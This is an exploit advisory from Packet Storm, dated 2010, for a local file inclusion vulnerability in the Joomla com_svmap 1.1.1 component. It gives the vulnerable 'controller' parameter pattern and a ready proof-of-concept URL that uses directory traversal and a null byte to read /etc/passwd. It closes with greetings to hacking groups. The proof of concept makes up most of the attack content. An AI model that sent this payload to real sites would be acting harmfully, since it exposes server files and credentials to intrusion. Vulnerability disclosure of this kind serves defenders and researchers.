Joomla SVMap 1.1.1 Local File Inclusion

2010-04-06T00:00:00
ID PACKETSTORM:88060
Type packetstorm
Reporter Vrs-hCk
Modified 2010-04-06T00:00:00

Description

                                        
                                            ` ================================================================================================  
  
Title : Joomla Component com_svmap v1.1.1 LFI Vulnerability  
Vendor : http://www.la-souris-verte.com  
  
Date : Monday, 05 April 2010 (Indonesia)  
Author : Vrs-hCk  
Contact : ander[at]antisecurity.org  
Blog : http://c0li.blogspot.com/  
  
================================================================================================  
  
[+] Exploit  
  
http://[site]/[path]/index.php?option=com_svmap&controller=[LFI]  
  
[+] PoC  
  
http://localhost/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00  
  
================================================================================================  
  
Greetz :  
  
www.MainHack.net - www.ServerIsDown.org - www.AntiSecurity.org  
Paman, NoGe, OoN_Boy, pizzyroot, zxvf, matthews, Genex, s4va, stardustmemory,  
wishnusakti, bl4Ck_3n91n3, H312Y, S3T4N, xr00tb0y, str0ke, dkk.  
  
================================================================================================  
  
# c0li.m0de.0n  
`